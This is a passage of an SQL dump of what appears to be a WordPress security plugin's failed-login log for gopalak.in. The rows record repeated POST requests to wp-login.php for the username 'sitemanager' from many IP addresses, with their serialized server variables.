00:00:00'),(94243,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42314\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.74.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745550711.2724609;s:12:\"REQUEST_TIME\";i:1745550711;}}','167.86.74.244',0,'2025-04-25 08:41:53','1970-01-01 00:00:00'),(94244,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39856\";s:11:\"REMOTE_ADDR\";s:14:\"183.90.183.156\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745551122.8166931;s:12:\"REQUEST_TIME\";i:1745551122;}}','183.90.183.156',0,'2025-04-25 08:48:44','1970-01-01 00:00:00'),(94245,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48648\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745551537.7306981;s:12:\"REQUEST_TIME\";i:1745551537;}}','51.38.119.44',0,'2025-04-25 08:55:39','1970-01-01 00:00:00'),(94246,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40694\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.16.194\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745551963.7594171;s:12:\"REQUEST_TIME\";i:1745551963;}}','139.59.16.194',0,'2025-04-25 09:02:45','1970-01-01 00:00:00'),(94247,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57324\";s:11:\"REMOTE_ADDR\";s:14:\"103.169.35.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745552392.57916;s:12:\"REQUEST_TIME\";i:1745552392;}}','103.169.35.190',0,'2025-04-25 09:09:54','1970-01-01 00:00:00'),(94248,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51900\";s:11:\"REMOTE_ADDR\";s:12:\"198.199.67.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745552816.3872161;s:12:\"REQUEST_TIME\";i:1745552816;}}','198.199.67.5',0,'2025-04-25 09:16:58','1970-01-01 00:00:00'),(94249,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34346\";s:11:\"REMOTE_ADDR\";s:12:\"176.74.26.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745553242.9480169;s:12:\"REQUEST_TIME\";i:1745553242;}}','176.74.26.54',0,'2025-04-25 09:24:04','1970-01-01 00:00:00'),(94250,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47840\";s:11:\"REMOTE_ADDR\";s:12:\"51.75.55.211\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745553662.6289599;s:12:\"REQUEST_TIME\";i:1745553662;}}','51.75.55.211',0,'2025-04-25 09:31:04','1970-01-01 00:00:00'),(94251,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47638\";s:11:\"REMOTE_ADDR\";s:11:\"66.29.153.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745554081.336596;s:12:\"REQUEST_TIME\";i:1745554081;}}','66.29.153.5',0,'2025-04-25 09:38:03','1970-01-01 00:00:00'),(94252,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, br, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50882\";s:11:\"REMOTE_ADDR\";s:13:\"74.208.229.14\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745554502.416477;s:12:\"REQUEST_TIME\";i:1745554502;}}','74.208.229.14',0,'2025-04-25 09:45:04','1970-01-01 00:00:00'),(94253,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45180\";s:11:\"REMOTE_ADDR\";s:14:\"95.217.147.111\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-